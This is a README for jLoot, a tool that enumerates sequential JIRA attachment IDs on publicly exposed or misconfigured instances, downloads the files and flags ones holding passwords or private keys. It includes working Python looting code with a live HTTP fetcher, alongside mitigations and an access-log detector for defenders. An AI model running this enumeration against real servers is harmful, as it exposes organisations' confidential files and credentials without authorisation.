
jLoot - JIRA Secure Attachment Looter

jLoot is a tool that can be used to enumerate attachments to JIRA tickets.

JIRA stores every file attached to an issue under a sequential numeric attachment ID. Most installations put access controls in front of those IDs, but on an instance that was meant to be public, or whose permissions were misconfigured by the organization, anyone who can reach the server can walk the ID space and fetch every file.

jLoot automates that walk: it checks whether an attachment exists at each ID and downloads it if it does.

jLoot ships with a basic set of yara rules that scan each downloaded file for sensitive words. If a rule matches, the rule name is highlighted in red next to the file name. Use the -y flag to supply your own yara rules, or edit jLoot.yar.

Files that match a yara rule are saved with "CHECK_" prefixed to the file name, so the sensitive ones are easy to find in the output directory later.
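The loop described above, as an added example written for this page rather than jLoot's own code. It assumes the attachment URL layout /secure/attachment/<id>/<name> (not stated on the page) and stands in for jLoot.yar with a couple of regular expressions so it runs offline; the fake in-memory "instance" is constructed sample data, and the id prefix on saved file names and the consecutive-miss cutoff are this example's own choices:

```python
import os
import re
import tempfile
import urllib.error
import urllib.request

# Hypothetical stand-in for jLoot.yar: byte patterns keyed by rule name.
# jLoot itself compiles yara rules with yara-python; regexes keep this offline.
DEFAULT_RULES = {
    "password_assignment": re.compile(rb"password\s*[:=]", re.IGNORECASE),
    "private_key_block": re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def match_rules(data, rules=DEFAULT_RULES):
    """Return the names of every rule whose pattern occurs in data."""
    return [name for name, pat in rules.items() if pat.search(data)]


def http_fetch(base_url, attachment_id):
    """Fetch one attachment by id over HTTP (for live use, not run here).

    Assumed URL layout: <base_url>/secure/attachment/<id>/x
    Returns (filename, bytes) on 200, None on 404; other errors propagate.
    """
    url = "%s/secure/attachment/%d/x" % (base_url.rstrip("/"), attachment_id)
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            cd = resp.headers.get("Content-Disposition", "")
            m = re.search(r'filename="?([^";]+)"?', cd)
            name = m.group(1) if m else "attachment_%d" % attachment_id
            return name, resp.read()
    except urllib.error.HTTPError as e:
        if e.code == 404:
            return None
        raise


def loot(fetch, start_id, limit, out_dir, rules=DEFAULT_RULES, max_misses=50):
    """Walk ids upward from start_id and save every attachment that exists.

    fetch(attachment_id) -> (filename, bytes), or None when the id is absent.
    Stops after `limit` downloads, or after `max_misses` consecutive missing
    ids (an added safeguard, not a jLoot option). Files that match a rule are
    saved with the CHECK_ prefix, as jLoot does.
    Returns a list of (attachment_id, saved_path, matched_rule_names).
    """
    os.makedirs(out_dir, exist_ok=True)
    results = []
    attachment_id = start_id
    misses = 0
    while len(results) < limit and misses < max_misses:
        hit = fetch(attachment_id)
        if hit is None:
            misses += 1
        else:
            misses = 0
            filename, data = hit
            # Never trust a served filename as a path: strip any directory part.
            safe_name = os.path.basename(filename) or "attachment"
            matched = match_rules(data, rules)
            if matched:
                safe_name = "CHECK_" + safe_name
            # The id prefix avoids collisions between same-named attachments.
            path = os.path.join(out_dir, "%d_%s" % (attachment_id, safe_name))
            with open(path, "wb") as f:
                f.write(data)
            results.append((attachment_id, path, matched))
        attachment_id += 1
    return results


# Constructed sample "instance": attachments at non-contiguous ids, with a
# gap at 10002 the way a deleted attachment would leave one.
FAKE_ATTACHMENTS = {
    10000: ("notes.txt", b"meeting notes, nothing sensitive\n"),
    10001: ("deploy.env", b"DB_PASSWORD=hunter2\n"),
    10003: ("id_rsa", b"-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n"),
}


def fake_fetch(attachment_id):
    """In-memory replacement for http_fetch, so the example runs offline."""
    return FAKE_ATTACHMENTS.get(attachment_id)


def demo(out_dir=None, limit=10):
    """Run loot() against the constructed instance; returns the results list."""
    out_dir = out_dir or tempfile.mkdtemp(prefix="loot_")
    return loot(fake_fetch, start_id=10000, limit=limit, out_dir=out_dir)


if __name__ == "__main__":
    for aid, path, matched in demo():
        flag = "  <-- " + ", ".join(matched) if matched else ""
        print(aid, os.path.basename(path) + flag)
```

Against a live instance, pass functools.partial(http_fetch, base_url) as the fetch callable. Note that a 404 for one id says nothing about the next one, which is why the walk continues through gaps rather than stopping at the first miss.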

Command Line Options

The following command line options are supported:

 -u baseURL     The base url of the JIRA instance
 -s start_id    The starting attachment ID (attachments start at 10000)
 -l limit       The limit for file downloads
 -o out_dir     The output directory (default is loot/)
 -y yara_rules  Specify custom yara rules

Setup

If you don't have yara installed, follow the yara installation guide first. Then install the Python bindings with python3 -m pip install yara-python.

If importing yara fails with an error about libyara not being found, the dynamic linker is not searching the directory yara was installed into (by default /usr/local/lib, which some distributions leave off the search path). Add it and refresh the linker cache:

sudo sh -c 'echo "/usr/local/lib" >> /etc/ld.so.conf'
sudo ldconfig

If you installed yara under a different prefix, use that prefix's lib directory instead of /usr/local/lib.

How do I not let this be a thing?

JIRA supports anonymous access, and a project whose permission scheme grants Browse Projects to anyone on the web exposes its issues, and therefore their attachments, to unauthenticated users. There are a few mitigations you can implement:

  • Server Side Rate-Limiting: a sequential walk of the attachment ID space is many requests from one client in a short time; throttling attachment downloads per client slows it to a crawl and makes it visible in your logs
  • Firewall Rules: restrict which networks can reach the instance at all if it does not need to be on the public internet
  • Granular Permissions on JIRA: review each project's permission scheme so that Browse Projects, and with it attachment access, is not granted to anonymous users unless that is intended
  • Require Authentication to JIRA: disable anonymous access entirely so every attachment request is tied to an account
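Rate-limiting and permission review are preventive; the same traffic pattern is also easy to detect after the fact. The following detector is an added example for this page, not part of jLoot or of JIRA. It assumes the combined access-log format that Apache and nginx emit by default and the /secure/attachment/<id>/<name> path layout (neither is stated on the page); the log lines it runs over are constructed sample data. It flags a client that touches many distinct attachment ids where the ids are almost all consecutive or the responses are mostly 404, which is what an ID walk looks like from the server side:

```python
import re
from collections import defaultdict

# Assumed combined log format (Apache/nginx default); adjust for your proxy.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed JIRA attachment path layout: /secure/attachment/<id>/<filename>
ATTACH_RE = re.compile(r"^/secure/attachment/(\d+)/")


def parse_line(line):
    """Return (client_ip, attachment_id, status) for attachment requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    p = ATTACH_RE.match(m.group("path"))
    if not p:
        return None
    return m.group("ip"), int(p.group(1)), int(m.group("status"))


def find_enumerators(lines, min_ids=20, min_404_ratio=0.5, min_sequential=0.9):
    """Flag clients whose attachment requests look like an ID walk.

    A client is flagged when it requests at least `min_ids` distinct ids and
    either most of those requests were 404s (probing ids that do not exist)
    or nearly every id is one more than the previous one (a sequential walk,
    which a public instance answers with 200s). Returns {ip: stats}.
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ip, aid, status = rec
            per_ip[ip].append((aid, status))

    flagged = {}
    for ip, hits in per_ip.items():
        ids = sorted({a for a, _ in hits})
        if len(ids) < min_ids:
            continue
        not_found = sum(1 for _, s in hits if s == 404)
        nf_ratio = not_found / len(hits)
        steps = [b - a for a, b in zip(ids, ids[1:])]
        seq_ratio = sum(1 for s in steps if s == 1) / len(steps) if steps else 0.0
        if nf_ratio >= min_404_ratio or seq_ratio >= min_sequential:
            flagged[ip] = {
                "requests": len(hits),
                "distinct_ids": len(ids),
                "not_found": not_found,
                "sequential": seq_ratio >= min_sequential,
            }
    return flagged


def sample_log():
    """Constructed access-log lines: one enumerating client, one ordinary user."""
    lines = []
    for i, aid in enumerate(range(10000, 10040)):
        status = 200 if aid in (10003, 10017, 10031) else 404
        lines.append(
            '203.0.113.5 - - [10/Oct/2023:13:55:%02d +0000] '
            '"GET /secure/attachment/%d/x HTTP/1.1" %d 512 "-" "python-requests/2.31"'
            % (i % 60, aid, status)
        )
    lines.append(
        '198.51.100.7 - alice [10/Oct/2023:13:57:01 +0000] '
        '"GET /secure/attachment/10031/design.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"'
    )
    lines.append(
        '198.51.100.7 - alice [10/Oct/2023:13:57:05 +0000] '
        '"GET /browse/PROJ-42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"'
    )
    return lines


if __name__ == "__main__":
    for ip, stats in find_enumerators(sample_log()).items():
        print(ip, stats)
```

The thresholds are starting points, not tuned values: a user who uploads a batch of files to one ticket and then downloads them again will produce a short run of consecutive ids with 200 responses, which is why min_ids is set well above what a single ticket usually carries, and why the 404 ratio is the stronger signal on an instance where anonymous browsing is already disabled.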

Here are some links for reference:

Shouts

Big shoutout to hermit for finding the initial dorks that led to this tool. Shoutout to ThugCrowd and all the Safari Zone Game Wardens.
